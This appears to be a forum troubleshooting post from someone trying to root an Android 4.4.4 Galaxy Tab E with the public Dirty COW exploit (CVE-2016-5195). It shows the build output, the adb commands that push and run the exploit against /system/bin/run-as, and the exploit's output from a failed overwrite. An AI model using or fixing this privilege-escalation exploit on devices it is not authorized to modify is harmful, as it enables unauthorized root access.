Can't overwrite run-as executable on Galaxy Tab E (Arch armeabi-v7a, Android 4.4.4 KitKat API 19)
ADB file transfer and dcow execution are successful, but when the executable tries to overwrite /system/bin/run-as, it fails without logging anything.
Here is the output of make root plus adb shell '/system/bin/run-as':
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-19
make[1]: Entering directory '/home/cyberazor/CVE-2016-5195'
[armeabi-v7a] Compile thumb : dirtycow <= dirtycow.c
[armeabi-v7a] Compile thumb : dirtycow <= dcow.c
[armeabi-v7a] Executable : dirtycow
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Compile thumb : run-as <= dirtycow.c
[armeabi-v7a] Compile thumb : run-as <= run-as.c
[armeabi-v7a] Executable : run-as
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/home/cyberazor/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5476) and destination file size (9440) differ
[*] size 9440
[*] mmap 0xb6ea8000
[*] currently 0xb6ea8000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6ea8000 9440
[*] madvise = 0 16777216
[*] /proc/self/mem 293580704 486075
[*] exploited 0 0xb6ea8000=464c457f
adb shell '/system/bin/run-as'
Usage: run-as <package-name> <command> [<args>]
The first thing the executable should do is print argv[0] (the program's relative/absolute path) and the UID. If it doesn't, it's not the exploit executable but the original one, so the overwriting of the run-as executable failed.